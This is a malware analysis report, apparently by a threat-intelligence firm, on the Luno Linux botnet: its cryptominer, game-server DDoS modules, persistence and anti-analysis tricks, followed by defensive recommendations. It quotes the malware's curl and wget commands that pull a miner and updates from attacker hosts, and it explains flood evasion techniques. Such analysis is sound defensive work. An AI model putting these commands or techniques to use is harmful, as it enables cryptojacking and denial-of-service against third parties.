Executive Summary

In a deep-dive analysis, Cyble Research and Intelligence Labs (CRIL) identified an ongoing in-the-wild Linux botnet campaign, which we have dubbed “Luno.” This campaign combines cryptocurrency mining, remote command execution, and modular DDoS attack capabilities. Additionally, it uses watchdog-based respawning and unusually strong anti-analysis defences into a single malware framework, indicating active professional threat actor involvement.

Unlike conventional cryptominers or DDoS botnets, LunoC2 exhibits process masquerading, binary replacement, and a self-update system, suggesting the malware is designed as a long-term criminal infrastructure tool.

Based on frequent updates to attack modules, it appears to be actively evolving and being augmented with new functionalities.

Key Takeaways

• The Luno Botnet campaign is carried out with a dual motivation: Cryptomining and DDoS-as-Service.
• LunoC2’s architecture and pricing model suggest intent for long-term monetizationand operational flexibility.
• LunoC2 incorporates robust anti-analysis, self-healing via infinite loop watchdogs, signal resistance for termination signals, and disguises itself as legitimate processes.
• Protects its socket connections by terminating unauthorized processes and uses redundant fallback mechanisms for C2 communication.
• Leverages mkstemp polymorphism for self-update binaries, ensuring unique filenames and trace cleanup.
• Employs session detachment (setsid) to daemonize and further obscure execution.
• Features a C2 command handler supporting dozens of DDoS attacks, arbitrary remote execution, and a self-destruct kill-switch.
• Capable of several DDoS attacks with tunable parameters (target, method, time, threads) with explicit target routines for Roblox, Minecraft, and Valve servers, potentially indicating a botnet-for-hire model.

Overview

Luno botnet is a Linux malware family that exhibits hallmarks of a modular botnet platform rather than a single-purpose cryptominer or trojan. The malware ensures recovery and persistence through watchdog-based respawning and binary replacement.  

While no direct links to known threat actors have been confirmed, the attribution remains uncertain. However, it was identified that the threat actor is selling DDoS services via a Telegram channel created on 28/07/2025, which was observed in one of the subdomains (See Figures 1 and 2).

Luno is advertised via main.botnet[.]world, which also hosts the cryptominer component downloaded by malware (xmrig). The DDoS modules are specifically designed to target gaming platforms and offer a range of attack capabilities (See Figure 3).

As per the Telegram channel, the botnet campaign appears to be actively developing DDoS attack modules. The latest modules are tested on Hetzner Servers (1x udp-flood), nuxt[.]cloud ISP (1x udp-bypass) (See Figure 4).

As per the admin using the handle name “udpboss”, the sample appears to have been baselined from standard volumetric flood attacks to game-server-specific attacks (See Figure 5).

The malware brings a fully featured DDoS attack launcher with dozens of attacks, achieving thread control, remote command execution, self-update, process camouflage, anti-analysis, and anti-forensics capabilities. These capabilities enable operators to conduct denial-of-service attacks across multiple protocols in a stealthy manner.

The inner workings and functionalities of this malware are detailed in the Technical Analysis section.

Technical Analysis

Upon startup, the malware reads its own process name – expecting a masqueraded name either as a kernel thread or legitimate shell utilities. If running as “[kworker/0:1]”, it enters an infinite watchdog loop, continuously forking and respawning itself disguised as bash. Otherwise, execution continues into the payload executor, which does the heavy lifting, executing as a child process under the supervision of the parent process.

The parent process continuously monitors the child’s exit status and respawns it whenever necessary, ensuring the malware never gets killed.

The key functionality of the malware is as follows:

Self-Healing Watchdog Threads

The malware launches watchdog threads that continuously monitor the parent process and respawn it under a disguised name if it terminates. Combined with signal-handling resistance, this mechanism ensures persistence and resilience against administrative termination attempts.

Network Scanner & Process Killer

The malware monitors host network connections by reading /proc/net/tcp and /proc/net/udp, terminating any unauthorized processes attempting to use the Luno-specific connection socket unless they appear on its whitelist. This whitelist contains 48 process names (including system daemons, user sessions, display services, terminal multiplexers, browsers, package managers, and network utilities) as well as specific IP addresses (See Figure 6).

Notably, these include IP addresses corresponding to Cloudflare, Google, Quad, and C2 servers. While the initial variant permitted only 4 IP addresses, the update binary expanded the whitelist to 24 IP addresses.

Signal Resistance & Masquerading

Ignores termination signals (SIGSEGV, SIGTERM, SIGINT, SIGHUP, and SIGPIPE) to protect itself from easy termination while disguising itself as “bash”. This essentially modifies content in /proc/<pid>/comm and /proc/<pid>/status (See Figure 7).

Persistence & Execution

Forms an HTTP GET request to download a file named ss from botnet.world, grants it executable permissions and replaces system binaries in /usr/bin/ (See Figure 8).

This mechanism aids persistence by masquerading as legitimate system utilities on the target host (see Figure 9).

Cryptominer Deployment

The malware then silently downloads the xmrig miner from main.botnet[.]world using curl (curl -sLo /bin/ash https://main[.]botnet[.]world/xmrig), and saves it as /bin/ash (See Figure 10).

It then applies execution permissions and launches ‘ash’ with the following options:

• –cpu-max-threads-hint=15 : max out CPU usage to use nearly all CPU cores.
• Mining Pool : pool.supportxmr[.]com:3333.
• Hardcoded wallet : 4B9gxLDjJP2ZNHm8R6k3hUTT9ozmArqUggecuyDntnWKYS9h3HLJAzs8TV2YP8P7VkMshJxtPnJJ5iZRQmncKWyVAwadHH2

The replacement of the legitimate ash shell (Almquist Shell) commonly found in embedded Linux distributions such as BusyBox, OpenWrt, and Alpine Linux suggests that the malware is specifically targeting resource-constrained systems for cryptocurrency mining, where ash is the default shell.

C2 Communication

It tries to resolve the C2 domain (botnet[.]world) using 111.0.0[.]2 as a fallback IP address in case the DNS resolution fails. Upon successful resolution, it starts receiving commands from the server.

The command handler scans the input buffer for the following commands and actions:

• If 4 input items were scanned, proceed with DDoS attack.   
• self_destruct : functions as a kill-switch, executing self-deletion stealthily by leveraging setsid(2) for session detachment and prctl(2) for process renaming.
• stop/exit/quit : halts specific attack threads (stop <method>).
• .update : polymorphic binary self-update via wget.
• .exec : allows for an arbitrary command to be executed remotely via system(3) (See Figure 11).

The .update mechanism starts by setting up a temporary file via mkstemp(3) (/tmp/.sh_updXXXXXX – where the X’s are replaced by unique names).

A child process is forked and downloads the update binary (wget -qO /tmp/.sh_updXXXXXX <C2_URL>) by iterating over 3 hardcoded C2 URLs (See Figure 12).

Anti-Analysis Techniques

The malware carries techniques to thwart analysis attempts (see Figure 13).

• Debugger/Tracer detection: checks /proc/self/status for the value of TracerPid field.
• Tool detection: parses /proc/<pid>/cmdline to find if any process contains “gdb”, “strace”, “ltrace”, “radare2”, “frida”, “dbg”, “x64dbg”, “ida”.
• Network Interface detection: checks NIC interfaces for anomalies.
• Timing checks: measures CPU clock for 10000000 iterations to detect execution-delay.

It does this by inspecting the execution environment. If an anomaly is detected, it attempts to self-delete itself from disk (See Figure 14).

DDoS Attack Modules

The DDoS_attack_launcher carries the core DDoS capabilities, where the dispatcher enables both thread-based floods and external binary execution, covering a wide range of protocols (See Figure 15).

The dispatcher starts by forming the attack parameter structure (including port and duration), setting up the detached pthread attribute (PTHREAD_CREATE_DETACHED), and comparing the attack type against hardcoded DDoS methods using a series of string comparisons (manually unrolled strcmp logic). The table detailing the attack types used by the botnet agent is listed below (see Figure 16).

Figure 16 – DDoS attack methods

Attacks like udp-bypass and tcp-bypass are more advanced than standard volumetric floods. The attacker randomizes the packet size and destination port, evading basic signature-based detection rules (See Figure 17).

The malware has an HTTP GET flood attack function to simulate real browser traffic with randomized headers. It uses a hardcoded list of random user-agents (4 agents) with 102 legitimate referrers that mimic human browsing diversity and evade basic detections (See Figure 18).

The malware appears to be targeting game servers that possess Minecraft-specific DDoS attack functions, Valorant-specific QUIC packets, and Raknet engine components (used by many gaming engines for multiplayer functionality).

The Raknet command used by the malware uses the RakNet protocol handshake to bypass any simple firewall rules or rate-limiting that only block untrusted, non-protocol UDP traffic. By completing the handshake, the attacker makes the traffic look legitimate to the server, causing the server to waste resources processing the flood of incoming packets (See Figure 19).

The raknet-mix command, however, is more advanced as it floods the target using a variety of randomized packets to make its traffic look more diverse and difficult to block with a single rule.

Several games, like Lego Universe and Minecraft Bedrock, rely on the Raknet protocol (or a modified version of it) for multiplayer functionality, making them potential targets for RakNet-based DDoS.

Minecraft-based attacks are launched via the commands mc-fakejoin and Minecraft-fakeplay. The mc-fakejoin command simulates thousands of fake Minecraft clients joining a server to overwhelm it—either by maxing out its player slots or saturating its network with login traffic (See Figure 20).

The minecraft-fakeplay command sends half-open login packets, where the server allocates resources waiting for authentication that never completes, gradually exhausting its connection pool.

Valorant-based attacks are launched via a DDoS module named “valorant-quic” that targets Valorant’s QUIC-based servers with a 1200-byte UDP packet, which is the minimum size of an initial QUIC packet (defined in RFC 9000), to avoid amplification abuse (See Figure 21).

Notably, several attack methods are tailored for gaming services (game-roblox, valorant-quic, Minecraft-fakeplay), further making them suitable targets for DDoS-for-hire operations. By leveraging these combined capabilities, Luno grants threat actors the capability to launch dozens of DDoS attack methods across a variety of protocols.

Conclusion

LunoC2 represents a step-change in Linux botnet sophistication. Its ability to replace core system binaries, run a watchdog-driven self-healing loop, mine cryptocurrency, and launch modular DDoS attacks marks it as both a financially motivated cryptojacker and a botnet-as-a-service platform.

Given its resilience, modularity, monetization potential, resource theft, and service disruption capabilities, all of which possess operational and financial risks for organizations, defenders should treat LunoC2 as a long-term threat to Linux environments, particularly internet-facing servers and game-hosting platforms.

Cyble’s Threat Intelligence Platforms continuously monitor such threats, infrastructure, and malware activity across the dark web, deep web, and open sources. This proactive intelligence empowers organizations with early detection, infrastructure mapping, and attribution insights. Altogether, these capabilities provide a critical head start in mitigating and responding to evolving cyber threats.

Our Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

• Monitor for unexpected CPU spikes and unauthorized xmrig processes.
• Use EDR rules to flag suspicious prctl process renaming.
• Enforce network filtering to block unauthorized connections to mining pools or C2 domains.
• Deploy file integrity monitoring for /bin and /usr/bin/ directories.
• Monitor for process names that don’t match their binary path or hash.
• Alert on short-lived bash processes continuously spawning a fork-exec loop.
• Check /bin/ash hash against known-good; watching for network connections to Monero pools.
• Alert on manual DNS resolution attempts using known suspicious fallback IP (111.0.0[.]2)
• Look for high network throughput by non-root services or obscure binaries to detect DDoS threads from unknown processes.

MITRE ATT&CK® Techniques 

Indicators of Compromise (IOCs) 

Appendix

Referrer list for Browser-based HTTP flood